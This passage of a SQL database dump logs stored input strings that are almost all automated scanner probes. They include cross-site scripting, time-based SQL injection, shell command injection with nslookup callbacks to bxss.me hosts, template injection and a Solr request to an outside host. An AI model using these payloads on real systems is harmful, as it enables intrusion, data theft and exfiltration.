18:56:49'),(539,'the<ScR<ScRiPt>IpT>CiIO(9563)</sCr<ScRiPt>IpT>',12,1,NULL,1,1,1,0,'2021-12-01 18:56:52'),(541,'the<ScRiPt \r\n>CiIO(9126)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-01 18:56:59'),(543,'the<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9887></ScRiPt>',24,1,NULL,1,1,1,0,'2021-12-01 18:57:02'),(545,'the<\0ScRiPt \r\n>CiIO(9470)</ScRiPt>',9,1,NULL,1,1,1,0,'2021-12-01 18:57:11'),(547,'the<video><source onerror=\"javascript:CiIO(9539)\">',9,1,NULL,1,1,1,0,'2021-12-01 18:57:14'),(549,'the<svg	\n\r?\0onload=CiIO(9919);>',9,1,NULL,1,1,1,0,'2021-12-01 18:57:17'),(551,'the<isindex type=image src=1 onerror=CiIO(9535)>',19,1,NULL,1,1,1,0,'2021-12-01 18:57:27'),(553,'the<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9558\'>',9,1,NULL,1,1,1,0,'2021-12-01 18:57:34'),(555,'the<body onload=CiIO(9336)>',10,1,NULL,1,1,1,0,'2021-12-01 18:57:40'),(557,'the<img src=//xss.bxss.me/t/dot.gif onload=CiIO(9066)>',24,1,NULL,1,1,1,0,'2021-12-01 18:57:43'),(559,'the<img src=xyz OnErRor=CiIO(9599)>',9,1,NULL,1,1,1,0,'2021-12-01 18:57:47'),(561,'the<img/src=\">\" onerror=alert(9034)>',9,1,NULL,1,1,1,0,'2021-12-01 18:57:55'),(563,'%74%68%65%3C%53%63%52%69%50%74%20%3E%43%69%49%4F%289213%29%3C%2F%73%43%72%69%70%54%3E',7,1,NULL,1,1,1,0,'2021-12-01 18:57:59'),(565,'the\\u003CScRiPt\\CiIO(9065)\\u003C/sCripT\\u003E',9,1,NULL,1,1,1,0,'2021-12-01 18:58:10'),(567,'the&lt;ScRiPt&gt;CiIO(9432)&lt;/sCripT&gt;',9,1,NULL,1,1,1,0,'2021-12-01 18:58:17'),(569,'?<img acu onmouseover=CiIO(9374) //?>',0,1,NULL,1,1,1,0,'2021-12-01 18:58:26'),(571,'the<input autofocus onfocus=CiIO(9700)>',9,1,NULL,1,1,1,0,'2021-12-01 18:58:35'),(573,'<a HrEF=http://xss.bxss.me></a>',24,4,NULL,1,1,1,0,'2021-12-02 00:06:26'),(575,'<a HrEF=jaVaScRiPT:>',24,4,NULL,1,1,1,0,'2021-12-02 00:06:31'),(577,'[url=http://xss.bxss.me][/url]',0,4,NULL,1,1,1,0,'2024-02-19 21:33:29'),(579,'the<img<!-- --> src=x onerror=alert(9585);//><!-- -->',9,1,NULL,1,1,1,0,'2021-12-01 18:59:15'),(581,'the}body{acu:Expre/**/SSion(CiIO(9799))}',2,1,NULL,1,1,1,0,'2021-12-01 18:59:20'),(583,'the<% contenteditable onresize=CiIO(9755)>',9,1,NULL,1,1,1,0,'2021-12-01 18:59:39'),(585,'theU5LkW\n<ScRiPt >CiIO(9569)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-01 18:59:46'),(587,'the<WIVKEC>Y0RSD[!+!]</WIVKEC>',9,1,NULL,1,1,1,0,'2021-12-01 18:59:59'),(589,'the<ifRAme sRc=9723.com></IfRamE>',19,1,NULL,1,1,1,0,'2021-12-01 19:00:22'),(591,'the<IVPuNq x=9201>',9,1,NULL,1,1,1,0,'2021-12-01 19:00:26'),(593,'the<img sRc=\'http://attacker-9368/log.php?',9,1,NULL,1,1,1,0,'2021-12-01 19:00:35'),(595,'the<aboC0r<',9,1,NULL,1,1,1,0,'2021-12-01 19:00:39'),(597,'the9397\"();}]9413',0,1,NULL,1,1,1,0,'2021-12-01 19:00:43'),(599,'%74%68%65%39%38%38%37%22%28%29%3B%7D%5D%39%33%33%38',0,1,NULL,1,1,1,0,'2021-12-01 19:00:45'),(601,'the</script><script>CiIO(9994)</script>',9,1,NULL,1,1,1,0,'2021-12-01 19:00:56'),(641,'ScfCVS9P',0,1,NULL,1,1,1,0,'2021-12-01 22:59:06'),(643,'the\' AND 2*3*8=6*8 AND \'oqCK\'=\'oqCK',10,1,NULL,1,1,1,0,'2021-12-01 22:59:10'),(645,'the\" AND 2*3*8=6*8 AND \"wpiK\"=\"wpiK',10,1,NULL,1,1,1,0,'2021-12-01 22:59:14'),(647,'the%\' AND 2*3*8=6*8 AND \'phbq\'!=\'phbq%',10,1,NULL,1,1,1,0,'2021-12-01 22:59:25'),(649,'-1 OR 2+173-173-1=0+0+0+1',7,1,NULL,1,1,1,0,'2021-12-01 22:59:27'),(651,'-1 OR 3+173-173-1=0+0+0+1',6,1,NULL,1,1,1,0,'2021-12-01 22:59:34'),(653,'-1 OR 3*2<(0+5+173-173)',7,1,NULL,1,1,1,0,'2021-12-01 22:59:39'),(655,'the\' RLIKE (SELECT (CASE WHEN (687=687) THEN 1 ELSE 0x28 END)) --',7,1,NULL,1,1,1,0,'2021-12-01 22:59:46'),(661,'if(now()=sysdate(),sleep(15),0)',0,3,NULL,1,1,1,0,'2024-02-19 13:10:16'),(663,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003696990529\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003696990529\\u0039\\u0039\\u',10,1,NULL,1,1,1,0,'2021-12-01 23:00:18'),(665,'aaa&shards=http://hittnfcharfylffe30.bxss.me/solr',7,1,NULL,1,1,1,0,'2021-12-01 23:00:21'),(671,'0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z',0,3,NULL,1,1,1,0,'2024-03-01 03:10:37'),(681,'dJwvMMkT',0,1,NULL,1,1,1,0,'2021-12-01 23:00:33'),(683,'0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z',0,3,NULL,1,1,1,0,'2024-02-20 00:16:13'),(685,'response.write(9920177*9881732)',0,1,NULL,1,1,1,0,'2021-12-01 23:00:35'),(697,'(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/',14,2,NULL,1,1,1,0,'2021-12-01 23:58:14'),(709,'1 waitfor delay \'0:0:15\' --',12,2,NULL,1,1,1,0,'2021-12-01 23:58:21'),(715,'\'+response.write(9920177*9881732)+\'',0,1,NULL,1,1,1,0,'2021-12-01 23:00:52'),(721,'\"+response.write(9920177*9881732)+\"',0,1,NULL,1,1,1,0,'2021-12-01 23:00:56'),(727,'yK5gtLtM\'; waitfor delay \'0:0:15\' --',0,1,NULL,1,1,1,0,'2021-12-01 23:00:59'),(740,'the&n907841=v956013',1,1,NULL,1,1,1,0,'2021-12-01 23:01:10'),(746,'echo dczvuv$()\\ nvykzm\\nz^xyu||a #\' &echo dczvuv$()\\ nvykzm\\nz^xyu||a #|\" &echo dczvuv$()\\ nvykzm\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:01:13'),(751,'${9999859+9999926}',0,1,NULL,1,1,1,0,'2021-12-01 23:01:16'),(753,'YPE2tb3L\' OR 449=(SELECT 449 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:01:16'),(759,'&echo egsriq$()\\ pibdfn\\nz^xyu||a #\' &echo egsriq$()\\ pibdfn\\nz^xyu||a #|\" &echo egsriq$()\\ pibdfn\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:01:19'),(766,'|echo dgvlqn$()\\ loegkx\\nz^xyu||a #\' |echo dgvlqn$()\\ loegkx\\nz^xyu||a #|\" |echo dgvlqn$()\\ loegkx\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:01:21'),(770,'(nslookup hitunwijangsu8842d.bxss.me||perl -e \"gethostbyname(\'hitunwijangsu8842d.bxss.me\')\")',10,1,NULL,1,1,1,0,'2021-12-01 23:01:24'),(780,'UsbWW270\') OR 498=(SELECT 498 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:01:29'),(792,'$(nslookup hithtadgzsbjkb2f8e.bxss.me||perl -e \"gethostbyname(\'hithtadgzsbjkb2f8e.bxss.me\')\")',10,1,NULL,1,1,1,0,'2021-12-01 23:01:35'),(796,'\'.gethostbyname(lc(\'hithx\'.\'xgpemhpic6882.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(107).chr(69).chr(97).chr(87).\'',10,1,NULL,1,1,1,0,'2021-12-01 23:01:38'),(798,'TdTm3eiW\')) OR 949=(SELECT 949 FROM PG_SLEEP(15))--',0,1,NULL,1,1,1,0,'2021-12-01 23:01:38'),(800,'&(nslookup hitaamnzbhzkzfde88.bxss.me||perl -e \"gethostbyname(\'hitaamnzbhzkzfde88.bxss.me\')\")&\'\\\"`0&(nslookup hitaamnzbhzkzfde88',10,1,NULL,1,1,1,0,'2021-12-01 23:01:40'),(808,'\".gethostbyname(lc(\"hitvt\".\"fzsagagq61d7e.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(109).chr(87).chr(111).chr(82).\"',10,1,NULL,1,1,1,0,'2021-12-01 23:01:44'),(809,'|(nslookup hitoaekhaqrpx4336b.bxss.me||perl -e \"gethostbyname(\'hitoaekhaqrpx4336b.bxss.me\')\")',10,1,NULL,1,1,1,0,'2021-12-01 23:01:44'),(824,'the\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'',9,2,NULL,1,1,1,0,'2021-12-01 23:58:57'),(826,'`(nslookup hitncflinxznfc3623.bxss.me||perl -e \"gethostbyname(\'hitncflinxznfc3623.bxss.me\')\")`',10,1,NULL,1,1,1,0,'2021-12-01 23:01:53'),(832,';(nslookup hitrcbfpvbenw841ac.bxss.me||perl -e \"gethostbyname(\'hitrcbfpvbenw841ac.bxss.me\')\")|(nslookup hitrcbfpvbenw841ac.bxss.',10,1,NULL,1,1,1,0,'2021-12-01 23:01:57'),(849,'@@yNcf1',0,1,NULL,1,1,1,0,'2021-12-01 23:02:08'),(882,'\"+\"A\".concat(70-3).concat(22*4).concat(97).concat(76).concat(114).concat(74)+(require\"socket\"\nSocket.gethostbyname(\"hitym\"+\"rjuy',10,1,NULL,1,1,1,0,'2021-12-01 23:02:27'),(897,'\'+\'A\'.concat(70-3).concat(22*4).concat(109).concat(69).concat(100).concat(83)+(require\'socket\'\nSocket.gethostbyname(\'hitbq\'+\'sdw',10,1,NULL,1,1,1,0,'2021-12-01 23:02:33'),(901,'908752',0,1,NULL,1,1,1,0,'2021-12-01 23:02:37'),(957,'the\'\"()&%<acx><ScRiPt >8U6V(9217)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:04:54'),(959,'\'\"()&%<acx><ScRiPt >8U6V(9863)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-01 23:04:57'),(961,'the9778115',0,1,NULL,1,1,1,0,'2021-12-01 23:05:00'),(963,'the9778115<',0,1,NULL,1,1,1,0,'2021-12-01 23:05:23'),(965,'acu4422＜s1﹥s2ʺs3ʹuca4422',0,1,NULL,1,1,1,0,'2021-12-01 23:05:29'),(967,'acux5926??z1??z2a?bcxuca5926',0,1,NULL,1,1,1,0,'2021-12-01 23:05:33'),(969,'{{49816*49343}}',0,1,NULL,1,1,1,0,'2021-12-01 23:05:38'),(971,'acu7309＜s1﹥s2ʺs3ʹuca7309',0,1,NULL,1,1,1,0,'2021-12-01 23:05:42'),(973,'acux4788??z1??z2a?bcxuca4788',0,1,NULL,1,1,1,0,'2021-12-01 23:05:49'),(975,'{{49169*50190}}',0,1,NULL,1,1,1,0,'2021-12-01 23:05:57'),(977,'acu3930＜s1﹥s2ʺs3ʹuca3930',0,1,NULL,1,1,1,0,'2021-12-01 23:06:03'),(979,'acux8594??z1??z2a?bcxuca8594',0,1,NULL,1,1,1,0,'2021-12-01 23:06:11'),(981,'{{49973*50312}}',0,1,NULL,1,1,1,0,'2021-12-01 23:06:13'),(983,'acu4612＜s1﹥s2ʺs3ʹuca4612',0,1,NULL,1,1,1,0,'2021-12-01 23:06:19'),(985,'acux9928??z1??z2a?bcxuca9928',0,1,NULL,1,1,1,0,'2021-12-01 23:06:22'),(987,'{{49162*50162}}',0,1,NULL,1,1,1,0,'2021-12-01 23:06:29'),(989,'acu9011＜s1﹥s2ʺs3ʹuca9011',0,1,NULL,1,1,1,0,'2021-12-01 23:06:33'),(991,'acux2034??z1??z2a?bcxuca2034',0,1,NULL,1,1,1,0,'2021-12-01 23:06:41'),(993,'{{49930*50234}}',0,1,NULL,1,1,1,0,'2021-12-01 23:07:02'),(995,'acu7923＜s1﹥s2ʺs3ʹuca7923',0,1,NULL,1,1,1,0,'2021-12-01 23:07:06'),(997,'acux7762??z1??z2a?bcxuca7762',0,1,NULL,1,1,1,0,'2021-12-01 23:07:10'),(999,'{{49255*49984}}',0,1,NULL,1,1,1,0,'2021-12-01 23:07:15'),(1001,'the\"onmouseover=8U6V(9463)\"',1,1,NULL,1,1,1,0,'2021-12-01 23:07:20'),(1003,'the\" EOqE=8U6V([!+!]) Lfd=\"',1,1,NULL,1,1,1,0,'2021-12-01 23:07:28'),(1005,'the\\u0022onmouseover=8U6V(9714)\\u0022',1,1,NULL,1,1,1,0,'2021-12-01 23:07:33'),(1007,'%74%68%65%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%38%55%36%56%28%39%35%39%39%29%22',0,1,NULL,1,1,1,0,'2021-12-01 23:07:36'),(1009,'?\"onmouseover=8U6V(9798)//',0,1,NULL,1,1,1,0,'2021-12-01 23:07:42'),(1011,'the\"sTYLe=\'acu:Expre/**/SSion(8U6V(9232))\'bad=\"',1,1,NULL,1,1,1,0,'2021-12-01 23:07:46'),(1013,'the\"><script>8U6V(9723)</script>',1,1,NULL,1,1,1,0,'2021-12-01 23:07:49'),(1015,'the</title><ScRiPt >8U6V(9853)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:07:54'),(1017,'the<ScRiPt >8U6V(9675)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:08:03'),(1019,'the<WZW0Z1>URUEC[!+!]</WZW0Z1>',1,1,NULL,1,1,1,0,'2021-12-01 23:08:08'),(1021,'the<script>8U6V(9532)</script>',1,1,NULL,1,1,1,0,'2021-12-01 23:08:22'),(1023,'the<ScR<ScRiPt>IpT>8U6V(9568)</sCr<ScRiPt>IpT>',3,1,NULL,1,1,1,0,'2021-12-01 23:08:35'),(1025,'the<ScRiPt \r\n>8U6V(9693)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:08:39'),(1027,'the<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9717></ScRiPt>',10,1,NULL,1,1,1,0,'2021-12-01 23:08:42'),(1029,'the<\0ScRiPt \r\n>8U6V(9504)</ScRiPt>',1,1,NULL,1,1,1,0,'2021-12-01 23:09:01'),(1031,'the<video><source onerror=\"javascript:8U6V(9056)\">',1,1,NULL,1,1,1,0,'2021-12-01 23:09:05'),(1033,'the<svg	\n\r?\0onload=8U6V(9231);>',1,1,NULL,1,1,1,0,'2021-12-01 23:09:07'),(1035,'the<isindex type=image src=1 onerror=8U6V(9136)>',8,1,NULL,1,1,1,0,'2021-12-01 23:09:12'),(1037,'the<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9723\'>',1,1,NULL,1,1,1,0,'2021-12-01 23:09:16'),(1039,'the<body onload=8U6V(9963)>',1,1,NULL,1,1,1,0,'2021-12-01 23:09:27'),(1041,'the<img src=//xss.bxss.me/t/dot.gif onload=8U6V(9171)>',10,1,NULL,1,1,1,0,'2021-12-01 23:09:30'),(1043,'the<img src=xyz OnErRor=8U6V(9126)>',1,1,NULL,1,1,1,0,'2021-12-01 23:09:33'),(1045,'the<img/src=\">\" onerror=alert(9123)>',1,1,NULL,1,1,1,0,'2021-12-01 23:09:44'),(1047,'%74%68%65%3C%53%63%52%69%50%74%20%3E%38%55%36%56%289341%29%3C%2F%73%43%72%69%70%54%3E',1,1,NULL,1,1,1,0,'2021-12-01 23:09:47'),(1049,'the\\u003CScRiPt\\8U6V(9203)\\u003C/sCripT\\u003E',1,1,NULL,1,1,1,0,'2021-12-01 23:09:55'),(1051,'the&lt;ScRiPt&gt;8U6V(9683)&lt;/sCripT&gt;',1,1,NULL,1,1,1,0,'2021-12-01 23:09:57'),(1053,'?<img acu onmouseover=8U6V(9261) //?>',0,1,NULL,1,1,1,0,'2021-12-01 23:10:13'),(1055,'the<input autofocus onfocus=8U6V(9626)>',1,1,NULL,1,1,1,0,'2021-12-01 23:10:17'),(1063,'the<img<!-- --> src=x onerror=alert(9143);//><!-- -->',1,1,NULL,1,1,1,0,'2021-12-01 23:10:57'),(1065,'the}body{acu:Expre/**/SSion(8U6V(9016))}',0,1,NULL,1,1,1,0,'2021-12-01 23:11:00'),(1067,'the<% contenteditable onresize=8U6V(9503)>',1,1,NULL,1,1,1,0,'2021-12-01 23:11:04'),(1069,'theiakEF\n<ScRiPt >8U6V(9314)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-01 23:11:07'),(1071,'the<WVQMDD>VEKHJ[!+!]</WVQMDD>',1,1,NULL,1,1,1,0,'2021-12-01 23:11:14'),(1073,'the<ifRAme sRc=9926.com></IfRamE>',6,1,NULL,1,1,1,0,'2021-12-01 23:11:19'),(1075,'the<hSoBRt x=9500>',1,1,NULL,1,1,1,0,'2021-12-01 23:11:26'),(1077,'the<img sRc=\'http://attacker-9433/log.php?',1,1,NULL,1,1,1,0,'2021-12-01 23:11:30'),(1079,'the<L6eCBX<',1,1,NULL,1,1,1,0,'2021-12-01 23:11:33'),(1081,'the9767\"();}]9559',0,1,NULL,1,1,1,0,'2021-12-01 23:11:37'),(1083,'%74%68%65%39%32%32%30%22%28%29%3B%7D%5D%39%32%35%32',0,1,NULL,1,1,1,0,'2021-12-01 23:11:41'),(1085,'the</script><script>8U6V(9387)</script>',1,1,NULL,1,1,1,0,'2021-12-01 23:11:47'),(1091,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003691991370\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003691991370\\u0039\\u0039\\u',14,1,NULL,1,1,1,0,'2021-12-01 23:20:15'),(1093,'aaa&shards=http://hitcnkmxpxjlb78180.bxss.me/solr',11,1,NULL,1,1,1,0,'2021-12-01 23:20:19'),(1095,'response.write(9296279*9006187)',0,1,NULL,1,1,1,0,'2021-12-01 23:20:20'),(1097,'echo lghylt$()\\ hjzkxr\\nz^xyu||a #\' &echo lghylt$()\\ hjzkxr\\nz^xyu||a #|\" &echo lghylt$()\\ hjzkxr\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:20:20'),(1103,'CmKlHFIE',0,1,NULL,1,1,1,0,'2021-12-01 23:20:24'),(1105,'&echo hiihyg$()\\ tuwmbv\\nz^xyu||a #\' &echo hiihyg$()\\ tuwmbv\\nz^xyu||a #|\" &echo hiihyg$()\\ tuwmbv\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:20:25'),(1107,'|echo hninyc$()\\ bglzbp\\nz^xyu||a #\' |echo hninyc$()\\ bglzbp\\nz^xyu||a #|\" |echo hninyc$()\\ bglzbp\\nz^xyu||a #',0,1,NULL,1,1,1,0,'2021-12-01 23:20:27'),(1113,'\'+response.write(9296279*9006187)+\'',0,1,NULL,1,1,1,0,'2021-12-01 23:20:28'),(1115,'(nslookup hitfqjlzslasv2c9aa.bxss.me||perl -e \"gethostbyname(\'hitfqjlzslasv2c9aa.bxss.me\')\")',15,1,NULL,1,1,1,0,'2021-12-01 23:20:30'),(1120,'$(nslookup hitfebymkurscbff03.bxss.me||perl -e \"gethostbyname(\'hitfebymkurscbff03.bxss.me\')\")',15,1,NULL,1,1,1,0,'2021-12-01 23:20:32'),(1123,'\"+response.write(9296279*9006187)+\"',0,1,NULL,1,1,1,0,'2021-12-01 23:20:33'),(1125,'&(nslookup hitrbakcsrnbu0a953.bxss.me||perl -e \"gethostbyname(\'hitrbakcsrnbu0a953.bxss.me\')\")&\'\\\"`0&(nslookup hitrbakcsrnbu0a953',15,1,NULL,1,1,1,0,'2021-12-01 23:20:35'),(1130,'j6venOCr',0,1,NULL,1,1,1,0,'2021-12-01 23:20:36'),(1135,'|(nslookup hituslbxzqtspdb3fc.bxss.me||perl -e \"gethostbyname(\'hituslbxzqtspdb3fc.bxss.me\')\")',15,1,NULL,1,1,1,0,'2021-12-01 23:20:39'),(1138,'${9999269+9999786}',0,1,NULL,1,1,1,0,'2021-12-01 23:20:40'),(1141,'`(nslookup hitcnfhouamlp23ecc.bxss.me||perl -e \"gethostbyname(\'hitcnfhouamlp23ecc.bxss.me\')\")`',15,1,NULL,1,1,1,0,'2021-12-01 23:20:41'),(1143,'the\' AND 2*3*8=6*8 AND \'yq3R\'=\'yq3R',15,1,NULL,1,1,1,0,'2021-12-01 23:20:42'),(1145,'the&n931158=v905671',6,1,NULL,1,1,1,0,'2021-12-01 23:20:43'),(1146,';(nslookup hitquduohnfqyd28cc.bxss.me||perl -e \"gethostbyname(\'hitquduohnfqyd28cc.bxss.me\')\")|(nslookup hitquduohnfqyd28cc.bxss.',15,1,NULL,1,1,1,0,'2021-12-01 23:20:44'),(1148,'the\" AND 2*3*8=6*8 AND \"0kPW\"=\"0kPW',15,1,NULL,1,1,1,0,'2021-12-01 23:20:45'),(1160,'\'.gethostbyname(lc(\'hitbo\'.\'ngdytuar62f45.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(102).chr(83).chr(112).chr(74).\'',15,1,NULL,1,1,1,0,'2021-12-01 23:20:53'),(1162,'the%\' AND 2*3*8=6*8 AND \'64MM\'!=\'64MM%',15,1,NULL,1,1,1,0,'2021-12-01 23:20:54'),(1166,'-1 OR 2+377-377-1=0+0+0+1',12,1,NULL,1,1,1,0,'2021-12-01 23:20:58'),(1170,'\".gethostbyname(lc(\"hitru\".\"xkaznnkz412d4.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(98).chr(72).chr(107).chr(70).\"',15,1,NULL,1,1,1,0,'2021-12-01 23:21:00'),(1171,'-1 OR 3+377-377-1=0+0+0+1',9,1,NULL,1,1,1,0,'2021-12-01 23:21:00'),(1177,'-1 OR 3*2<(0+5+377-377)',13,1,NULL,1,1,1,0,'2021-12-01 23:21:04'),(1186,'\"+\"A\".concat(70-3).concat(22*4).concat(112).concat(89).concat(117).concat(80)+(require\"socket\"\nSocket.gethostbyname(\"hitrs\"+\"juw',15,1,NULL,1,1,1,0,'2021-12-01 23:21:09'),(1189,'-1 OR 3*2>(0+5+377-377)',13,1,NULL,1,1,1,0,'2021-12-01 23:21:12'),(1193,'\'+\'A\'.concat(70-3).concat(22*4).concat(118).concat(86).concat(108).concat(84)+(require\'socket\'\nSocket.gethostbyname(\'hitlm\'+\'ker',15,1,NULL,1,1,1,0,'2021-12-01 23:21:14'),(1198,'the\' RLIKE (SELECT (CASE WHEN (113=113) THEN 1 ELSE 0x28 END)) --',10,1,NULL,1,1,1,0,'2021-12-01 23:21:16'),(1210,'916461',0,1,NULL,1,1,1,0,'2021-12-01 23:21:20'),(1215,'the\'\"()&%<acx><ScRiPt >l0Wc(9616)</ScRiPt>',6,1,NULL,1,1,1,0,'2021-12-01 23:21:23'),(1221,'\'\"()&%<acx><ScRiPt >l0Wc(9258)</ScRiPt>',0,1,NULL,1,1,1,0,'2021-12-01 23:21:27'),(1227,'the9483050',0,1,NULL,1,1,1,0,'2021-12-01 23:21:36'),(1235,'the9483050<',0,1,NULL,1,1,1,0,'2021-12-01 23:21:42'),(1239,'acu1477＜s1﹥s2ʺs3ʹuca1477',0,1,NULL,1,1,1,0,'2021-12-01 23:21:43'),(1241,'@@O5816',0,1,NULL,1,1,1,0,'2021-12-01 23:21:44'),(1243,'acux8067??z1??z2a?bcxuca8067',0,1,NULL,1,1,1,0,'2021-12-01 23:21:47'),(1245,'{{50074*50084}}',0,1,NULL,1,1,1,0,'2021-12-01 23:22:00'),(1247,'acu5519＜s1﹥s2ʺs3ʹuca5519',0,1,NULL,1,1,1,0,'2021-12-01 23:22:07'),(1249,'acux6778??z1??z2a?bcxuca6778',0,1,NULL,1,1,1,0,'2021-12-01 23:22:11'),(1251,'{{49937*50488}}',0,1,NULL,1,1,1,0,'2021-12-01 23:22:14'),(1253,'acu9271＜s1﹥s2ʺs3ʹuca9271',0,1,NULL,1,1,1,0,'2021-12-01 23:22:19'),(1255,'acux8482??z1??z2a?bcxuca8482',0,1,NULL,1,1,1,0,'2021-12-01 23:22:23'),(1257,'{{50384*49085}}',0,1,NULL,1,1,1,0,'2021-12-01 23:22:25'),(1259,'acu8744＜s1﹥s2ʺs3ʹuca8744',0,1,NULL,1,1,1,0,'2021-12-01 23:22:32'),(1261,'acux5156??z1??z2a?bcxuca5156',0,1,NULL,1,1,1,0,'2021-12-01 23:22:41'),(1263,'{{49719*49586}}',0,1,NULL,1,1,1,0,'2021-12-01 23:22:49'),(1265,'acu10519＜s1﹥s2ʺs3ʹuca10519',0,1,NULL,1,1,1,0,'2021-12-01 23:22:58'),(1267,'acux2707??z1??z2a?bcxuca2707',0,1,NULL,1,1,1,0,'2021-12-01 23:23:01'),(1269,'{{49467*49507}}',0,1,NULL,1,1,1,0,'2021-12-01 23:23:08'),(1271,'acu1096＜s1﹥s2ʺs3ʹuca1096',0,1,NULL,1,1,1,0,'2021-12-01 23:23:11'),(1273,'acux6133??z1??z2a?bcxuca6133',0,1,NULL,1,1,1,0,'2021-12-01 23:23:13'),(1275,'{{49304*49300}}',0,1,NULL,1,1,1,0,'2021-12-01 23:23:19'),(1277,'acu5146＜s1﹥s2ʺs3ʹuca5146',0,1,NULL,1,1,1,0,'2021-12-01 23:23:24'),(1279,'acux7293??z1??z2a?bcxuca7293',0,1,NULL,1,1,1,0,'2021-12-01 23:23:33'),(1281,'{{49010*50247}}',0,1,NULL,1,1,1,0,'2021-12-01 23:23:35'),(1283,'acu7182＜s1﹥s2ʺs3ʹuca7182',0,1,NULL,1,1,1,0,'2021-12-01 23:23:46'),(1285,'acux8957??z1??z2a?bcxuca8957',0,1,NULL,1,1,1,0,'2021-12-01 23:23:48'),(1287,'{{50226*49079}}',0,1,NULL,1,1,1,0,'2021-12-01 23:23:53'),(1289,'the\"onmouseover=l0Wc(9492)\"',6,1,NULL,1,1,1,0,'2021-12-01 23:23:56'),(1291,'the\" N6gX=l0Wc([!+!]) bka=\"',6,1,NULL,1,1,1,0,'2021-12-01 23:23:59'),(1293,'the\\u0022onmouseover=l0Wc(9579)\\u0022',6,1,NULL,1,1,1,0,'2021-12-01 23:24:03'),(1295,'%74%68%65%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%6C%30%57%63%28%39%36%36%39%29%22',0,1,NULL,1,1,1,0,'2021-12-01 23:24:06'),(1297,'?\"onmouseover=l0Wc(9052)//',0,1,NULL,1,1,1,0,'2021-12-01 23:24:12'),(1299,'the\"sTYLe=\'acu:Expre/**/SSion(l0Wc(9578))\'bad=\"',7,1,NULL,1,1,1,0,'2021-12-01 23:24:27'),(1301,'the\"><script>l0Wc(9601)</script>',6,1,NULL,1,1,1,0,'2021-12-01 23:24:29'),(1303,'the</title><ScRiPt >l0Wc(9109)</ScRiPt>',6,1,NULL,1,1,1,0,'2021-12-01 23:24:33'),(1305,'the<ScRiPt >l0Wc(9449)</ScRiPt>',6,1,NULL,1,1,1,0,'2021-12-01 23:24:40'),(1307,'the<WJZX94>TACR4[!+!]</WJZX94>',6,1,NULL,1,1,1,0,'2021-12-01 23:24:43'),(1309,'the<script>l0Wc(9219)</script>',6,1,NULL,1,1,1,0,'2021-12-01 23:24:47'),(1311,'the<ScR<ScRiPt>IpT>l0Wc(9021)</sCr<ScRiPt>IpT>',9,1,NULL,1,1,1,0,'2021-12-01 23:24:50'),(1313,'the<ScRiPt \r\n>l0Wc(9331)</ScRiPt>',6,1,NULL,1,1,1,0,'2021-12-01 23:24:52'),(1315,'the<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9674></ScRiPt>',15,1,NULL,1,1,1,0,'2021-12-01 23:24:58'),(1317,'the<\0ScRiPt \r\n>l0Wc(9895)</ScRiPt>',6,1,NULL,1,1,1,0,'2021-12-01 23:25:09'),(1319,'the<video><source onerror=\"javascript:l0Wc(9831)\">',6,1,NULL,1,1,1,0,'2021-12-01 23:25:14'),(1321,'the<svg	\n\r?\0onload=l0Wc(9632);>',6,1,NULL,1,1,1,0,'2021-12-01 23:25:17'),(1323,'the<isindex type=image src=1 onerror=l0Wc(9595)>',12,1,NULL,1,1,1,0,'2021-12-01 23:25:28'),(1325,'the<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9567\'>',6,1,NULL,1,1,1,0,'2021-12-01 23:25:31'),(1327,'the<body onload=l0Wc(9730)>',7,1,NULL,1,1,1,0,'2021-12-01 23:25:36'),(1329,'the<img src=//xss.bxss.me/t/dot.gif onload=l0Wc(9762)>',15,1,NULL,1,1,1,0,'2021-12-01 23:25:47'),(1331,'the<img src=xyz OnErRor=l0Wc(9756)>',6,1,NULL,1,1,1,0,'2021-12-01 23:25:49'),(1333,'the<img/src=\">\" onerror=alert(9623)>',6,1,NULL,1,1,1,0,'2021-12-01 